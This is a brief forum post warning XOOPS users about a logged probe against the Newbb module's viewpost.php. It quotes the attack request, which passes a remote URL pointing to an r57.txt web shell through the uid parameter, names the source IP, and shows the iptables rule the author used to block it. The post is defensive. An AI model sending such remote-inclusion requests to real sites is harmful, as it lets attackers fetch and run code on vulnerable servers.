Hi all.

I wanted to warn XOOPS users of a current hack attempt/probe directed at Newbb (version unknown).

My logs have picked up the following:

/modules/newbb/viewpost.php?uid=http://by.sao.sitemynet.com/r57.txt?


Originating from 88.229.122.153.

My site appears not be vulnerable (newbb 3.x) as the uid is sanitised but all should be wary. I have IPTabled the IP address:

iptables -I INPUT -s 88.229.122.153 -j DROP


from my server and contacted the appropriate abuse emails.
